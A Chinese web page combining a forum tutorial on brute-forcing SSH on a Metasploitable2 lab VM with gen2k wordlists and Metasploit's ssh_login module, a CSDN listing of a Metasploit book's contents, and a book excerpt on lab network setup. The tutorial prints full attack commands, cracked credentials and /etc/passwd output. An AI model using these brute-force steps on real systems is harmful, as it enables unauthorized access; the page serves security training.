metasploitable2 靶机都没没界面的吗

查看: 1626|回复: 5
Metasploitable2系列教程【2】22/port:利用ssh_loing 模块批量验证
本帖最后由 月巴__又鸟 于
15:23 编辑
Metasploitable 2 系列教程【2】22/port : 利用msf ssh_loing 模块批量验证爆破 OpenSSH
By : sIyuAn
演示平台:Kali Linux / Metasploitable2
利用工具:Metasploit /&&nmap
漏洞利用:gen2k
漏洞端口:22/tcp open ssh OpenSSH 4.7p1 Debian
Metasploitable2下载地址:
Kali Linux下载地址:
--------------------------------------------------------------------------------------------------------------------------------
一、gen2k 自动匹配生成密码字典
#gen2k其实就是根据收集来的信息,自动生成密码自动的工具:
#假设现在我们已经收集了以下的信息:
metasploit
administrator
metasploitable
metasploitable2
。。。。。。
// 一般来说收集下靶机 metasploitable2 相关信息整合,用 gen2k 自动匹配生成相关密码。[1.txt用户名][2.txt匹配用户名生成密码]
gen2k 下载 :/9MgYX62m
国外墙了放百度盘:/s/1bnCILWj
root@kali:/opt/hacktools/script/gen2k# python gen2k.py -n -y -z -e -c -w 1.txt -o 2.txt
Total words generated: <font color="#ff
root@kali:/opt/hacktools/script/gen2k# ls -l
总用量 184
-rw-r--r-- 1 root root& &&&90&&3月 26 19:57 1.txt
-rw-r--r-- 1 root root <font color="#ff 3月 26 19:57 2.txt
-rwxr-xr-x 1 root root& &8113&&3月 26 15:08 gen2k.py
// 如实际爆破一般我用的命令是这个,生成的字典也比较全面但相对的也很大,在这里为了演示删减下:
root@kali:/opt/hacktools/script/gen2k# nano 1.txt
root@kali:/opt/hacktools/script/gen2k# python gen2k.py -c -w 1.txt -o 2.txt Total words generated: 12
root@kali:/opt/hacktools/script/gen2k# ls -l
-rw-r--r-- 1 root root& &25&&3月 27 13:31 1.txt
-rw-r--r-- 1 root root&&<font color="#ff&&3月 27 13:32 2.txt
-rwxr-xr-x 1 root root 8113&&3月 26 15:08 gen2k.py
root@kali:/opt/hacktools/script/gen2k# nano 2.txt
rootmsfadmin
msfadminadmin
msfadminroot
msfadminmsf
adminmsfadmin
msfmsfadmin
// 看就生成这几个密码,有我们用的就ok了。当然你也可以用 lantronix_telnet_version ; telnet_encrypt_overflow 模块来劫持,
每个利用都有不同方法看环境个人思路也不同在这只演示一个。
1、在MSF中使用nmap扫描目标机器:
msf& db_nmap -sV 10.0.0.15
Nmap: Starting Nmap 6.40 (
Nmap: Nmap scan report for 10.0.0.15 Nmap: Host is up (0.00052s latency).
Nmap: Not shown: 977 closed ports
Nmap: PORT& &&&STATE& &SERVICE& &&&VERSION
Nmap: 21/tcp& &open& && && & ftp& && && &vsftpd 2.3.4
Nmap: 22/tcp& &open& && && & ssh& && && &OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)& &&&#发现漏洞
Nmap: 23/tcp& &open& && &&&telnet& && &&&Linux telnetd& && && &
Nmap: 25/tcp& &open& && && &smtp& && &&&Postfix smtpd
Nmap: 53/tcp& &open& && &&&domain& && &ISC BIND 9.4.2
Nmap: 80/tcp& &open& && && & http& && &&&Apache httpd 2.2.8 ((Ubuntu) DAV/2)
Nmap: 111/tcp&&open& && &&&rpcbind& &&&2 (RPC #100000)
Nmap: 139/tcp&&open& & netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
Nmap: 445/tcp&&open& & netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
Nmap: 512/tcp&&open& && && &exec& && &&&netkit-rsh rexecd
Nmap: 513/tcp&&open& && &&&login?
Nmap: 514/tcp&&open& & tcpwrapped
Nmap: 1099/tcp open& & rmiregistry& &GNU Classpath grmiregistry& &&&
Nmap: 1524/tcp open& && && &shell& && &&&Metasploitable root shell
Nmap: 2049/tcp open& && && & nfs& && && &2-4 (RPC #100003)
Nmap: 2121/tcp open& && && & ftp& && && &ProFTPD 1.3.1
Nmap: 3306/tcp open& && &&&mysql& && & MySQL 5.0.51a-3ubuntu5
Nmap: 5432/tcp open& &&&postgresql&&PostgreSQL DB 8.3.0 - 8.3.7
Nmap: 5900/tcp open& && && & vnc& && && &VNC (protocol 3.3)
Nmap: 6000/tcp open& && && & X11& && && &(access denied)
Nmap: 6667/tcp open& && && && &irc& && && &Unreal ircd
Nmap: 8009/tcp open& && && &ajp13& && & Apache Jserv (Protocol v1.3)
Nmap: 8180/tcp open& && && &&&http& && &&&Apache Tomcat/Coyote JSP engine 1.1
2、查看漏洞信息:
msf & search ssh
Matching Modules
=============================================
& && && && && && && && & Name& && && && && && && && && && && && && && && && && && && && && && && && &Rank& && && && &&&Description
& && && && && && && && & ----& && && && && && && && && && && && && && && && && && && && && && && && &&&----------& && && && &&&-----------
& &auxiliary/dos/windows/ssh/sysax_sshd_kexchange& && && && && && && && &normal& &&&Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
& &auxiliary/fuzzers/ssh/ssh_kexinit_corrupt& && && && && && && && && && && && && &&&normal& &&&SSH Key Exchange Init Corruption
& &auxiliary/pro/apps/ssh_key/commander& && && && && && && && && && && && && & normal& &&&PRO: SSH Key Recycler
& &auxiliary/scanner/ssh/ssh_identify_pubkeys& && && && && && && && && && && &&&normal& &&&SSH Public Key Acceptance Scanner
& &auxiliary/scanner/ssh/ssh_login & && && && && && && && && && && && && && && && && &&&normal& &&&SSH Login Check Scanner
& &auxiliary/scanner/ssh/ssh_login_pubkey& && && && && && && && && && && && && & normal& &&&SSH Public Key Login Scanner
& &auxiliary/scanner/ssh/ssh_version& && && && && && && && && && && && && && && && & normal& &&&SSH Version Scanner
& &exploit/apple_ios/ssh/cydia_default_ssh& && && && && && && && && && && && && & excellent&&Apple iOS Default SSH Password Vulnerability
& &exploit/linux/ssh/f5_bigip_known_privkey& && && && && && && && && && && && & excellent&&F5 BIG-IP SSH Private Key Exposure
& &exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey& && &&&excellent&&Loadbalancer.org Enterprise VA SSH Private Key
msf & use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) & show options
Module options (auxiliary/scanner/ssh/ssh_login):
& &Name& && && && &&&Current Setting&&Required&&Description
& &----& && && && &&&---------------&&--------&&-----------
& &BLANK_PASSWORDS& &false& && && && &no& && &&&Try blank passwords for all users
& &BRUTEFORCE_SPEED&&5& && && && && & yes& && & How fast to bruteforce, from 0 to 5
& &DB_ALL_CREDS& && &false& && && && &no& && &&&Try each user/password couple stored in the current database
& &DB_ALL_PASS& && & false& && && && &no& && &&&Add all passwords in the current database to the list
& &DB_ALL_USERS& && &false& && && && &no& && &&&Add all users in the current database to the list
& &PASSWORD& && && && && && && && && &no& && &&&A specific password to authenticate with
& &PASS_FILE& && && && && && && && &&&no& && &&&File containing passwords, one per line
& &RHOSTS& && && && && && && && && &&&yes& && & The target address range or CIDR identifier
& &RPORT& && && && & 22& && && && && &yes& && & The target port
& &STOP_ON_SUCCESS& &false& && && && &yes& && & Stop guessing when a credential works for a host
& &THREADS& && && &&&1& && && && && & yes& && & The number of concurrent threads
& &USERNAME& && && && && && && && && &no& && &&&A specific username to authenticate as
& &USERPASS_FILE& && && && && && && & no& && &&&File containing users and passwords separated by space, one pair per line
& &USER_AS_PASS& && &false& && && && &no& && &&&Try the username as the password for all users
& &USER_FILE& && && && && && && && &&&no& && &&&File containing usernames, one per line
& &VERBOSE& && && &&&true& && && && & yes& && & Whether to print output for all attempts
本帖最后由 月巴__又鸟 于
15:30 编辑
3、设置MSF攻击选项,开始Exploit!
msf auxiliary(ssh_login) & set RHOSTS 10.0.0.15
RHOSTS =& 10.0.0.15
msf auxiliary(ssh_login) & set PASS_FILE /opt/hacktools/script/gen2k/2.txt& &// 生成密码字典路径
PASS_FILE =& /opt/hacktools/script/gen2k/2.txt
msf auxiliary(ssh_login) & set USER_FILE /opt/hacktools/script/gen2k/1.txt& &// 用户名字典路径
USER_FILE =& /opt/hacktools/script/gen2k/1.txt
msf auxiliary(ssh_login) & exploit 10.0.0.15:22 SSH - Starting bruteforce 10.0.0.15:22 SSH - [01/18] - Trying: username: 'msf' with password: 'msfadmin'
[-] 10.0.0.15:22 SSH - [01/18] - Failed: 'msf':'msfadmin' 10.0.0.15:22 SSH - [02/18] - Trying: username: 'msf' with password: 'adminmsf'
[-] 10.0.0.15:22 SSH - [02/18] - Failed: 'msf':'adminmsf' 10.0.0.15:22 SSH - [03/18] - Trying: username: 'msf' with password: 'msfadminmsf'
[-] 10.0.0.15:22 SSH - [03/18] - Failed: 'msf':'msfadminmsf'
[-] 10.0.0.15:22 SSH - [11/18] - Failed: 'admin':'adminmsfadmin' 10.0.0.15:22 SSH - [12/18] - Trying: username: 'admin' with password: 'msfmsfadmin'
[-] 10.0.0.15:22 SSH - [12/18] - Failed: 'admin':'msfmsfadmin' 10.0.0.15:22 SSH - [13/18] - Trying: username: 'msfadmin' with password: 'msfadmin' Command shell session 1 opened (10.0.0.6:41471 -& 10.0.0.15:22) at
20:19:39 +0800
[+] 10.0.0.15:22 SSH - [13/18] - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin)& &#爆破到一组账号和密码 groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),-16-server #1 SMP Thu Apr 10 13:58:00 UTC
GNU/Linux ' Scanned 1 of 1 hosts (100% complete) Auxiliary module execution completed
msf auxiliary(ssh_login) & exit -y
root@kali:~# ssh
The authenticity of host '10.0.0.15 (10.0.0.15)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.0.15' (RSA) to the list of known hosts.
's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
individual files in /usr/share/doc/*/copyright.
Last login: Tue Mar 25 09:22:56 2014
To run a command as administrator (user &root&), use &sudo &command&&.
See &man sudo_root& for details.
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
msfadmin@metasploitable:~$ ifconfig
eth0& && &Link encap:Ethernet&&HWaddr 00:0c:29:88:61:00&&
& && && & inet addr:10.0.0.15&&Bcast:10.0.0.255&&Mask:xxxxxxxxxx
& && && & inet6 addr:xxxxxxxxxxxxxxxxxxxxxxxx Scope: Link
& && && & UP BROADCAST RUNNING MULTICAST&&MTU:1500&&Metric:1
& && && & RX packets:13129 errors:0 dropped:0 overruns:0 frame:0
& && && & RX bytes:.1 MB)&&TX bytes:.1 MB)
msfadmin@metasploitable:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
。。。。。。
msfadmin@metasploitable:~$
本文为siyuan原创,首发红客联盟(),转载请注明出处!
这利用思路网上也有,但这自己写的,不是转载。&
以后转载别人的文章记得发原文链接&
这是原创的吗?
我以前也翻译过一篇文章 讲的也是Metasploitable2
你可以看一下:
早已看过,一直关注91ri,所以发的是讨论没发原创,其实OpenSSH 4.7p1有爆漏洞,但没找到exp&
Powered by&&&&Metasploit渗透测试指南.pdf
&Metasploit渗透测试指南.pdf
本书介绍Metasploit——近年来最强大、最流行和最有发展前途的开源渗透测试平台软件,以及基于Metasploit进行网络渗透测试与安全漏洞研究分析的技术、流程和方法。
  本书共有17章,覆盖了渗透测试的情报搜集、威胁建模、漏洞分析、渗透攻击和后渗透攻击各个环节,并包含了免杀技术、客户端渗透攻击、社会工程学、自动化渗透测试、无线网络攻击等高级技术专题,以及如何扩展Metasploit情报搜集、渗透攻击与后渗透攻击功能的实践方法,本书一步一个台阶地帮助初学者从零开始建立起作为渗透测试者的基本技能,也为职业的渗透测试工程师提供一本参考用书。本书获得了Metasploit开发团队的一致好评,Metasploit项目创始人HD Moore评价本书为:“现今最好的Metasploit框架软件参考指南”
-------------------------------------------------------------
《metasploit渗透测试指南》
第1章 渗透测试技术基础 1
1.1 ptes标准中的渗透测试阶段 2
1.1.1 前期交互阶段 2
1.1.2 情报搜集阶段 2
1.1.3 威胁建模阶段 2
1.1.4 漏洞分析阶段 3
1.1.5 渗透攻击阶段 3
1.1.6 后渗透攻击阶段 3
1.1.7 报告阶段 4
1.2 渗透测试类型 4
1.2.1 白盒测试 5
1.2.2 黑盒测试 5
1.3 漏洞扫描器 5
1.4 小结 6
第2章 metasploit基础 7
2.1 专业术语 7
2.1.1 渗透攻击(exploit) 8
2.1.2 攻击载荷(payload) 8
2.1.3 shellcode 8
.2.1.4 模块(module) 8
2.1.5 监听器(listener) 8
2.2 metasploit用户接口 8
2.2.1 msf终端 9
2.2.2 msf命令行 9
2.2.3 armitage 11
2.3 metasploit功能程序 12
2.3.1 msf攻击载荷生成器 12
2.3.2 msf编码器 13
2.3.3 nasm shell 13
2.4 metasploit express和metasploit pro 14
2.5 小结 14
第3章 情报搜集 15
3.1 被动信息搜集 16
3.1.1 whois查询 16
3.1.2 netcraft 17
3.1.3 nslookup 18
3.2 主动信息搜集 18
3.2.1 使用nmap进行端口扫描 18
3.2.2 在metasploit中使用数据库 20
3.2.3 使用metasploit进行端口扫描 25
3.3 针对性扫描 26
3.3.1 服务器消息块协议扫描 26
3.3.2 搜寻配置不当的microsoft sql server 27
3.3.3 ssh服务器扫描 28
3.3.4 ftp扫描 29
3.3.5 简单网管协议扫描 30
3.4 编写自己的扫描器 31
3.5 小结 33
第4章 漏洞扫描 35
4.1 基本的漏洞扫描 36
4.2 使用nexpose进行扫描 37
4.2.1 配置 37
4.2.2 将扫描报告导入到metasploit中 42
4.2.3 在msf控制台中运行nexpose 43
4.3 使用nessus进行扫描 44
4.3.1 配置nessus 44
4.3.2 创建nessus扫描策略 45
4.3.3 执行nessus扫描 47
4.3.4 nessus报告 47
4.3.5 将扫描结果导入metasploit框架中 48
4.3.6 在metasploit内部使用nessus进行扫描 49
4.4 专用漏洞扫描器 51
4.4.1 验证smb登录 51
4.4.2 扫描开放的vnc空口令 52
4.4.3 扫描开放的x11服务器 54
4.5 利用扫描结果进行自动化攻击 56
第5章 渗透攻击之旅 57
5.1 渗透攻击基础 58
5.1.1 msf] show exploits 58
5.1.2 msf] show auxiliary 58
5.1.3 msf] show options 58
5.1.4 msf] show payloads 60
5.1.5 msf] show targets 62
5.1.6 info 63
5.1.7 set和unset 63
5.1.8 setg和unsetg 64
5.1.9 save 64
5.2 你的第一次渗透攻击 64
5.3 攻击一台ubuntu主机 68
5.4 全端口攻击载荷:暴力猜解目标开放的端口 71
5.5 资源文件 72
5.6 小结 73
第6章 meterpreter 75
6.1 攻陷windows xp 虚拟机 76
6.1.1 使用nmap扫描端口 76
6.1.2 攻击ms sql 76
6.1.3 暴力破解ms sql服务器 78
6.1.4 xp_cmdshell 79
6.1.5 meterpreter基本命令 80
6.1.6 获取键盘记录 81
6.2 挖掘用户名和密码 82
6.2.1 提取密码哈希值 82
6.2.2 使用meterpreter命令获取密码哈希值 83
6.3 传递哈希值 84
6.4 权限提升 85
6.5 令牌假冒 87
6.6 使用ps 87
6.7 通过跳板攻击其他机器 89
6.8 使用meterpreter脚本 92
6.8.1 迁移进程 92
6.8.2 关闭杀毒软件 93
6.8.3 获取系统密码哈希值 93
6.8.4 查看目标机上的所有流量 93
6.8.5 攫取系统信息 93
6.8.6 控制持久化 94
6.9 向后渗透攻击模块转变 95
6.10 将命令行shell升级为meterpreter 95
6.11 通过附加的railgun组件操作windows api 97
6.12 小结 97
第7章 免杀技术 99
7.1 使用msf攻击载荷生成器创建可独立运行的二进制文件 100
7.2 躲避杀毒软件的检测 101
7.2.1 使用msf编码器 102
7.2.2 多重编码 103
7.3 自定义可执行文件模板 105
7.4 隐秘地启动一个攻击载荷 106
7.5 加壳软件 107
7.6 小结:关于免杀处理的最后忠告 108
第8章 客户端渗透攻击 109
8.1 基于浏览器的渗透攻击 110
8.1.1 基于浏览器的渗透攻击原理 111
8.1.2 空指令 112
8.2 使用immunity调试器来揭秘空指令机器码 112
8.3 对ie浏览器的极光漏洞进行渗透利用 116
8.4 文件格式漏洞渗透攻击 119
8.5 发送攻击负载 120
8.6 小结 121
第9章 metasploit辅助模块 123
9.1 使用辅助模块 126
9.2 辅助模块剖析 128
9.3 小结 133
第10章 社会工程学工具包 135
10.1 配置set工具包 136
10.2 针对性钓鱼攻击向量 137
10.3 web攻击向量 142
10.3.1 java applet 142
10.3.2 客户端web攻击 146
10.3.3 用户名和密码获取 148
10.3.4 标签页劫持攻击 150
10.3.5 中间人攻击 150
10.3.6 网页劫持 151
10.3.7 综合多重攻击方法 153
10.4 传染性媒体生成器 157
10.5 teensy usb hid攻击向量 157
10.6 set的其他特性 160
10.7 小结 161
第11章 fast-track 163
11.1 microsoft sql注入 164
11.1.1 sql注入——查询语句攻击 165
11.1.2 sql注入——post参数攻击 166
11.1.3 手工注入 167
11.1.4 ms sql破解 168
11.1.5 通过sql自动获得控制(sqlpwnage) 172
11.2 二进制到十六进制转换器 174
11.3 大规模客户端攻击 175
11.4 小结:对自动化渗透的一点看法 176
第12章 karmetasploit无线攻击套件 177
12.1 配置 178
12.2 开始攻击 179
12.3 获取凭证 181
12.4 得到shell 182
12.5 小结 184
第13章 编写你自己的模块 185
13.1 在ms sql上进行命令执行 186
13.2 探索一个已存在的metasploit模块 187
13.3 编写一个新的模块 189
13.3.1 powershell 189
13.3.2 运行shell渗透攻击 190
13.3.3 编写powershell_upload_exec函数 192
13.3.4 从十六进制转换回二进制程序 192
13.3.5 计数器 194
13.3.6 运行渗透攻击模块 195
13.4 小结:代码重用的能量 196
第14章 创建你自己的渗透攻击模块 197
14.1 fuzz测试的艺术 198
14.2 控制结构化异常处理链 201
14.3 绕过seh限制 204
14.4 获取返回地址 206
14.5 坏字符和远程代码执行 210
14.6 小结 213
第15章 将渗透代码移植到metasploit框架 215
15.1 汇编语言基础 216
15.1.1 eip和esp寄存器 216
15.1.2 jmp指令集 216
15.1.3 空指令和空指令滑行区 216
15.2 移植一个缓冲区溢出攻击代码 216
15.2.1 裁剪一个已有的渗透攻击代码 218
15.2.2 构造渗透攻击过程 219
15.2.3 测试我们的基础渗透代码 220
15.2.4 实现框架中的特性 221
15.2.5 增加随机化 222
15.2.6 消除空指令滑行区 223
15.2.7 去除伪造的shellcode 223
15.2.8 我们完整的模块代码 224
15.3 seh覆盖渗透代码 226
15.4 小结 233
第16章 meterpreter脚本编程 235
16.1 meterpreter脚本编程基础 235
16.2 meterpreter api 241
16.2.1 打印输出 241
16.2.2 基本api调用 242
16.2.3 meterpreter mixins 242
16.3 编写meterpreter脚本的规则 244
16.4 创建自己的meterpreter脚本 244
16.5 小结 250
第17章 一次模拟的渗透测试过程 251
17.1 前期交互 252
17.2 情报搜集 252
17.3 威胁建模 253
17.4 渗透攻击 255
17.5 msf终端中的渗透攻击过程 255
17.6 后渗透攻击 257
17.6.1 扫描metasploitable靶机 258
17.6.2 识别存有漏洞的服务 259
17.7 攻击apache tomcat 260
17.8 攻击一个偏门的服务 262
17.9 隐藏你的踪迹 264
17.10 小结 266
附录a 配置目标机器 267
附录b 命令参考列表 275
若举报审核通过,可奖励20下载分
被举报人:
举报的资源分:
请选择类型
资源无法下载
资源无法使用
标题与实际内容不符
含有危害国家安全内容
含有反动色情等内容
含广告内容
版权问题,侵犯个人或公司的版权
*详细原因:
VIP下载&&免积分60元/年(1200次)
您可能还需要
Q.为什么我点的下载下不了,但积分却被扣了
A. 由于下载人数众多,下载服务器做了并发的限制。若发现下载不了,请稍后再试,多次下载是不会重复扣分的。
Q.我的积分不多了,如何获取积分?
A. 获得积分,详细见。
完成任务获取积分。
论坛可用分兑换下载积分。
第一次绑定手机,将获得5个C币,C币可。
关注并绑定CSDNID,送10个下载分
下载资源意味着您已经同意遵守以下协议
资源的所有权益归上传用户所有
未经权益所有人同意,不得将资源中的内容挪作商业或盈利用途
CSDN下载频道仅提供交流平台,并不能对任何下载资源负责
下载资源中如有侵权或不适当内容,
本站不保证本站提供的资源的准确性,安全性和完整性,同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
安全技术下载排行
您当前C币:0&&&可兑换 0 下载积分
兑换下载分:&
消耗C币:0&
立即兑换&&
兑换成功你当前的下载分为 。前去下载资源
你下载资源过于频繁,请输入验证码
如何快速获得积分?
你已经下载过该资源,再次下载不需要扣除积分
Metasploit渗透测试指南.pdf
所需积分:2
剩余积分:0
扫描微信二维码精彩活动、课程更新抢先知
VIP会员,免积分下载
会员到期时间:日
剩余下载次数:1000
Metasploit渗透测试指南.pdf
剩余次数:&&&&有效期截止到:
你还不是VIP会员VIP会员享免积分 . 专属通道极速下载
VIP下载次数已满VIP会员享免积分 . 专属通道极速下载,请继续开通VIP会员
你的VIP会员已过期VIP会员享免积分 . 专属通道极速下载,请继续开通VIP会员2.配置靶机与分析机环境
本文所属图书&>&
全书共10章。第1章对渗透测试和Metasploit进行了系统介绍,首先介绍了渗透测试的分类、方法、流程、过程环节等,然后介绍了Metasploit的功能、结构和基本的使用方法。第2章详细演示了渗透测试实验环境的搭建。第&&
按照如下步骤配置OWASP BWA靶机虚拟机镜像,模拟为定V安全公司DMZ区中的门户网站服务器:
1)从FTP站点定制的OWASP BWA靶机镜像,验证的压缩包完整无误之后,将压缩包解压到某一目录。
2)打开VMware Workstation软件,选择文件&打开,选择你的解压目录,选择相应的VMX文件。
3)配置靶机虚拟机的硬件,内存建议设置为512MB(宿主内存4GB),并在硬件选项卡中选择单击网络适配器,设置为NAT模式。
4)在OWASP虚拟机镜像的选项卡中选择打开虚拟机电源,虚拟机会自动分配到IP地址10.10.10.129(读者同样也可以手工设置该IP地址)。
5)测试网络环境。分别在BT5和OWASP虚拟机上互相ping对方IP地址,都能成功说明网络连通正常(注意,如果ping不通,请检查防火墙是否关闭)。
6)在BT5攻击机镜像上打开的,访问,应能够正常显示如图2-10所示的定V安全公司门户网站首页。
Win2K3 Metasploitable虚拟机镜像的配置步骤如下,模拟为定V安全公司DMZ区中的后台服务器:
1)从FTP站点下载定制的Win2K3 Metasploitable靶机镜像,验证下载的压缩包完整无误之后,将压缩包解压到某个目录。
2)打开VMware Workstation软件,选择文件&打开,选择你的解压目录,选择相应VMX文件。
3)配置靶机虚拟机的硬件选项:建议内存配置为768MB(宿主4GB内存),并在硬件选项卡中选择网络适配器,设置为NAT模式。
4)在Win2K3虚拟机的选项卡中选择打开虚拟机电源,虚拟机会自动分配到IP地址10.10.10.130(读者同样也可以手工设置该IP地址)。
5)分别在BT5和Win2K3虚拟机上运行ping命令,测试两台虚拟机能正常连通。
Linux Metasploitable虚拟机镜像的配置步骤如下,模拟为定V安全公司DMZ区中的网关服务器:
1)从FTP站点下载定制的Linux Metasploitable靶机镜像,验证下载的压缩包完整无误之后,将压缩包解压到某个目录下。
2)打开VMware Workstation软件,选择文件&打开,选择你的解压目录,选择相应VMX文件。
3)配置靶机虚拟机的硬件选项,如图2-11所示,建议内存配置为512MB(宿主4GB内存),你会发现Linux Metasploitable虚拟机配置了两个网络适配器,一个设置为NAT模式,一个设置为Host-only模式。
4)打开电源并登录后,在命令行下输入ifconfig,会发现有两个网卡eth0及eth1,两个网卡所对应的地址分别为10.10.10.254(NAT模式,连接模拟DMZ区的VMnet8虚拟网段)和192.168.10.254(Host-only模式,连接模拟企业内网的VMnet1虚拟网段,并作为VMnet1网段的网关)。
读者可能会问,定制版的Linux Metasploitable虚拟机,我们到底在上面进行了哪些配置,下面就详细说明配置IP地址及NAT路由转发功能的过程。
1)为Linux Metasploitable虚拟机添加了一个网络适配器2,并将其设置为Host-only模式,现在这台虚拟机就有两个网卡了,然后打开虚拟机,在命令行下输入sudo vim/etc/network/interfaces命令,修改/etc/network/interfaces网卡配置文件如下所示:
root@bt:~# sudo vim /etc/network/interfaces
  iface lo inet loopback
  iface eth0 inet static
  address 10.10.10.254
netmask 255.255.255.0
network 10.10.10.0
broadcast 10.10.10.255
  iface eth1 inet static
  address 192.168.10.254
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
提示 所有的修改过程都需要root权限,所以请以root用户登录或者输入正确的root密码。之后请输入sudo/etc/init.d/networking restart命令重启网卡,IP地址就设置完成了。
2)接下来是配置路由功能的过程。修改/etc下的sysctl.conf文件,打开数据包路由转发功能:
root@metasploitable:/etc# vim sysctl.conf
net.ipv4.ip_forward = 1&&&&&&&&&&&&&&&& #将这行注释取消掉
3)然后设置转发规则:
root@metasploitable:~# /sbin/iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -o eth0 -j MASQUERADE
192.168.10.0/24就是我们的VMnet1虚拟网段的IP地址范围,eth0是连接NAT模式VMnet8虚拟网段的网络适配器,但是,通过输入以上命令设置的规则在重启之后就会失效,所以,我们需要设置开机自动启动,通过在/etc/rc.local文件中添加以上命令就可以达到目的了。(注意:Linux启动的最后阶段会执行rc.local文件中的命令。)
以上就是我们对Linux Metasploitable虚拟机配置的全过程,如果读者感兴趣,可以自己尝试重新配置一下。
最后分别在BT5和Linux Metasploitable虚拟机上运行ping命令,测试两台虚拟机能正常连通。如果能够正常ping通,说明网卡eth0是正常工作的,对eth1及转发功能的测试在后面进行。
对WinXP Metasploitable虚拟机镜像进行如下配置,模拟为定V安全公司企业内网中的终端主机:
1)从FTP站点下载定制的WinXP Metasploitable靶机镜像,验证下载的压缩包完整无误之后,将压缩包解压到某一目录。
2)打开VMware Workstation软件,选择文件&打开,选择你的解压目录,选择相应的VMX文件。
3)配置WinXP Metasploitable靶机虚拟机的硬件,在硬件选项卡中选择网络适配器,设置Host-only模式,即连接模拟企业内网的VMnet1虚拟网段。
4)打开虚拟机电源启动WinXP Metasploitable虚拟机镜像,打开命令行终端,输入ipconfig/all,将显示如下信息(注意,虚拟机IP地址通过DHCP服务分配到192.168.10.128地址,网关被设置为192.168.10.254):
C:\Documents and Settings\Administrator&ipconfig /all
Windows IP Configuration
&&&&&&& Host Name . . . . . . . . . . . . : dh-ca
&&&&&&& Primary Dns Suffix&& . . . . . . . :
&&&&&&& Node Type . . . . . . . . . . . . : Unknown
&&&&&&& IP Routing Enabled. . . . . . . . : No
&&&&&&& WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
&&&&&&& Connection-specific DNS Suffix& .&& :
&&&&&&& Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
&&&&&&& Physical Address. . . . . . . . . : 00-0C-29-84-07-87
&&&&&&& Dhcp Enabled. . . . . . . . . . . : No
&&&&&&& IP Address. . . . . . . . . . . . : 192.168.10.128
&&&&&&& Subnet Mask . . . . . . . . . . . : 255.255.255.0
&&&&&&& Default Gateway . . . . . . . . . : 192.168.10.254
5)分别在WinXP Metasploitable和Linux Metasploitable虚拟机上运行ping命令,测试两台虚拟机能正常连通。
6)对WinXP上的C:\Windows\system32\hosts文件进行修改,加入以下内容。
C:\Documents and Settings\Administrator&type C:\Windows\system32\hosts
192.168.10.128&
192.168.10.254&
10.10.10.128&&&
10.10.10.129&&& &&
10.10.10.130&&&
10.10.10.254&&&
7)打开IE,访问,如果之前配置都正确,将会正常通过Linux Metloitable网关服务器的路由转发,访问到门户网站服务器上的页面,我们在模拟门户网站服务器的定制OWASP BWA靶机镜像上做了配置,企业内网网段终端主机访问门户网站服务器时,将会显示内部训练网站的登录页面,如图2-12所示。
至此,本书设计的渗透测试实验环境的配置就全部完成了,你是否已经部署一个完整的实践环境了呢?这只是个开始,后面还有更大的挑战等着你,做好准备了吗?
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
您的浏览器不支持嵌入式框架,或者当前配置为不显示嵌入式框架。
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'

我要回帖

更多关于 metasploit靶机下载 的文章

 

随机推荐